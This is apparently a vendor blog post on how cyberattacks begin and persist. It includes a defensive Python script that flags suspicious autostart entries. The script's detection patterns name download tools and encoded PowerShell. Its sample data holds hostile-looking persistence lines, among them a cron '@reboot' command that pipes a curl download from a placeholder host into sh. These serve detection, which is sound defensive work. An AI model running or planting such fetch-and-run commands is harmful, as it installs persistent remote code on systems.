Anatomy of a Cyberattack
In the current digital landscape, the threat of cyberattacks looms over businesses like an invisible specter. How does an attack start? How do threat actors access your systems and evade detection? How can the right support help ensure your business is responding to — and mitigating — these threats as effectively as possible? Those are the questions we’ll tackle in this post.
Where Does it All Start?
What is the genesis of most cyberattacks and breaches? While there are a range of attack types, most have one thing in common: the end user or employee is typically the gateway into any system. “The most common entry point is typically going to be an end user,” says Dan Roberts, Security Technician at Cooperative Systems. “It’s going to be a case of human error: someone clicks something they’re not supposed to and types in the wrong information in the wrong web page. It could be anything from a phishing email to a website that was hijacked to an ad that popped up. Someone opens a homepage and there’s a malicious advertisement there that’s been infected. Probably the most common, though, is going to be an end user clicking on a link in a phishing email. That’s the one that we’re seeing across the board throughout the industry as one of the most common vectors of infection.” On the other side of the coin, your employees should also be a point of protection for your business. “It’s kind of a nomenclature in cybersecurity that end users are the ‘human firewall,’” he continues. “They protect the endpoints and the network, and they work to prevent a lot of these attempts to get into networks, and so it’s very important that they understand the responsibility that they have in being in a business network or even at home. There are all sorts of different things to consider, and a lot of times end users don’t have the proper training or don’t think they’re important enough to be targeted, but that’s just not the case,” he adds.
Why Are Systems Targeted and How Are They Infiltrated?
Adversaries target businesses and systems for several reasons, not just for access. “There are a wide range of reasons,” Roberts notes. “You have some threat actors out there who do it just for laughs; just to be able to prove that they can get into somebody’s system. You have advanced persistent threats, or APTs, who are typically state actors that are attempting to gather information from foreign adversaries. You have hackers who are looking to get financial data, financial information, and financial logins. Money is definitely a driving factor, but sometimes there’s more money to be made in selling information than there is in the actual money that they could possibly get out of any accounts.” As adversaries become increasingly sophisticated, we’re seeing a larger “threat surface” and more techniques and methods for drilling into systems. Remote access trojans, or RATs, for example, have proliferated.
“Once a RAT gets into your system, a threat actor will be able to access that endpoint at any time,” he says. “Some threat actors will sell that access to others. Again, that usually comes from social engineering; from someone clicking something they shouldn’t.”
Blending in and Evading Detection
Part of what makes threat actors so dangerous is their ability to get into a system and stay there. In fact, research has shown that an adversary can remain in a system for as long as 26 days of “dwell time” before being detected. So, how do they avoid detection?
“Typically, they do it through obfuscation,” states Roberts. “For example, they can gain access through an application they build into a startup process that reaches out to a web server. They can set up a startup process to launch in the background to be able to reach out and reinstall that application after you think it’s been cleared.” He notes that, while endpoint detection and response (EDR) and extended detection and response (XDR) have been doing a much better job of picking up on obfuscation, standard antivirus or anti-malware may not pick up on encryption, which can create a gap between what you’re seeing and what’s actually happening.
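The persistence pattern Roberts describes, a startup item that runs in the background and reaches out to a web server to re-fetch its payload, is exactly the kind of thing a periodic autorun audit can surface. The script below is an added example written for this post; it is not Cooperative Systems’ tooling. It assumes you already have an inventory of autostart entries (registry Run keys, startup folders, cron lines) exported as location/name/command triples; the inventory shown here is constructed sample data, and the indicator patterns are the author’s own heuristics, not a vendor signature set.

```python
"""Flag autostart entries that look like web-fetching persistence.

Added example for this post. Input is an inventory of autorun entries
you have already collected (Sysinternals Autoruns, a registry export,
crontab -l, etc.). The SAMPLE_ENTRIES below are constructed, not taken
from any real host.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class AutorunEntry:
    location: str   # registry key, startup folder or crontab that launches it
    name: str       # value name, file name or cron schedule
    command: str    # the command line executed at startup


# Heuristic indicators that a startup command fetches or decodes content at launch.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|"
    r"\bcertutil\b.*-urlcache|\bbitsadmin\b)",
    re.IGNORECASE,
)
ENCODED_RE = re.compile(
    r"(-enc(odedcommand)?\b|FromBase64String|base64\s+-d)", re.IGNORECASE
)
# Directories any unprivileged user can write to; legitimate services rarely start from them.
USER_WRITABLE_RE = re.compile(
    r"(\\AppData\\Local\\Temp\\|\\AppData\\Roaming\\|%TEMP%|%APPDATA%|"
    r"\\Users\\Public\\|/tmp/|/dev/shm/)",
    re.IGNORECASE,
)


def assess_entry(entry: AutorunEntry) -> list[str]:
    """Return the reasons (possibly none) an entry matches the persistence pattern."""
    reasons: list[str] = []
    if URL_RE.search(entry.command):
        reasons.append("command embeds a URL")
    if DOWNLOAD_RE.search(entry.command):
        reasons.append("command uses a download tool or cmdlet")
    if ENCODED_RE.search(entry.command):
        reasons.append("command decodes base64/encoded content")
    if USER_WRITABLE_RE.search(entry.command):
        reasons.append("executable lives in a user-writable directory")
    return reasons


def audit_autoruns(entries: list[AutorunEntry]) -> dict[str, list[str]]:
    """Return {entry name: reasons} for every entry with at least one indicator."""
    findings: dict[str, list[str]] = {}
    for entry in entries:
        reasons = assess_entry(entry)
        if reasons:
            findings[entry.name] = reasons
    return findings


# Constructed inventory: two ordinary entries and two that match the pattern.
# The base64 string is a placeholder, not a real encoded command.
SAMPLE_ENTRIES = [
    AutorunEntry(r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
                 r"C:\Windows\System32\SecurityHealthSystray.exe"),
    AutorunEntry(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
                 r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    AutorunEntry(r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
                 "powershell.exe -w hidden -enc QUFBQUFBQUFBQQ=="),
    AutorunEntry("crontab:alice", "@reboot",
                 "curl -s http://example.invalid/agent.sh | sh"),
]

if __name__ == "__main__":
    for name, reasons in audit_autoruns(SAMPLE_ENTRIES).items():
        print(f"{name}: {'; '.join(reasons)}")
```

Run against a real inventory, the hits are leads rather than verdicts: an update agent that legitimately downloads from a vendor URL will match too, so the useful workflow is to baseline the entries you expect and review only what changes between audits.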
Another problem is that threat actors are finding antivirus loopholes. “There have been multiple reports of different types of antivirus or even EDR solutions that are being leveraged in order to bypass any built-in settings,” he says. “Typically, they’re patched relatively quickly, but if you have a ‘zero day’ — a broad term that describes recently discovered security vulnerabilities that hackers can use to attack systems — it’s called that for a reason. It’s very difficult to anticipate where a threat is going to come from and how threat actors will manipulate your system to get an initial foothold.”
How Cooperative Systems Helps
As far as responding to and mitigating threats, Cooperative Systems utilizes a full security stack for detection, behavioral analysis, prediction, and resolution. “There is a large push for trying to adapt to the situations before they actually get to the point of getting to an infection,” says Roberts. “We also work hard to keep our fingers on the pulse. There are new threats seemingly every day, so we keep our eyes on the constantly evolving threat landscape. From a preventive standpoint, doing the research and staying ahead of that curve has become one of our strengths. If there is a breach, we work with our clients on incident response and making them aware of the steps they need to take — we do a great deal of training — which can help reduce the chaos and stress should something occur.” For more information about our enhanced cybersecurity offerings, including in-depth cybersecurity awareness training for your employees, visit our website.